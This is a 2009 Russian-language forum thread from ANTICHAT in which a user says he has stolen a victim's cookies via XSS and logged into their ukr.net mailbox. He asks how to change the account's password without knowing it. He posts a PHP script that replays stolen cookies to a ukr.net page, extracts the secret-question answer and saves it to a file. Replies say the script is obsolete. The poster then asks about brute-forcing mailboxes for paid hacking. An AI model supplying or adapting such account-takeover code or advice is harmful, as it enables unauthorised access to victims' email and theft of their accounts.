ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
22.04.2009, 17:29
|
|
Новичок
Регистрация: 03.06.2006
Сообщений: 22
Провел на форуме:
79448
Репутация:
1
|
|
ukrNet: поиметь пароль
через XSS имею куки.
захожу на ящик жертвы нормально.
не нашел, за что бы зацепиться поменять пароль, не зная текущего...
в востановлении пароля используется секретный вопрос.
погуглив, нашел старенький скрипт, позволяющий имея куки выдрать ответ на секретный вопрос, правда работу его немного не понял )
вот он:
PHP код:
<?
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn";
$header.="Referer: http://e.ukr.netrn";
$header.="Cookie: ".$query."rn";
$header.="Host: e.ukr.netrnrn";
$fp=fsockopen("e.ukr.net", 80);
fwrite($fp, $header);
$dt="";
while (!feof($fp))
$dt.=fread($fp, 1024);
// выдираем из полученной страницы ответ на секретный вопрос
$answ1=strpos($dt,'Password_Answer')+24;
$answ2=strpos($dt,'" size="40">');
$length_answ=$answ2-$answ1;
$full_answer=substr($dt,$answ1,$length_answ);
// сохраняем полученный ответ на вопрос в файл: answer.html
$fp1=Fopen("answer.html","a");
fwrite($fp1,"$full_answer");
fclose($fp1);
fclose($fp);
?>
грамотные люди, подскажите есть ли рабочий скрипт такого плана или идеи по смене пароля..
удачи! |
|
|
22.04.2009, 20:58
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516
Репутация:
303
|
|
нет.
Возможно когда-то давно ответ на секретный вопрос можно было узнать просто попав в ящик, или сняв куки.
Данная строчка
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn";
обращение к данной странице, при помощи авторизации через куки. |
|
|
|
22.04.2009, 21:07
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Скрипт этот вообще древнейший. Какие-то стрпос... Все делается(лось) регулярками!
|
|
|
|
23.04.2009, 10:00
|
|
Новичок
Регистрация: 03.06.2006
Сообщений: 22
Провел на форуме:
79448
Репутация:
1
|
|
lmns не знал, что секретный вопрос лежал открыто раньше )
так что, значит не судьба поиметь пароль?
а народ, что за бабки ящики ломает, брутят что ли только?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
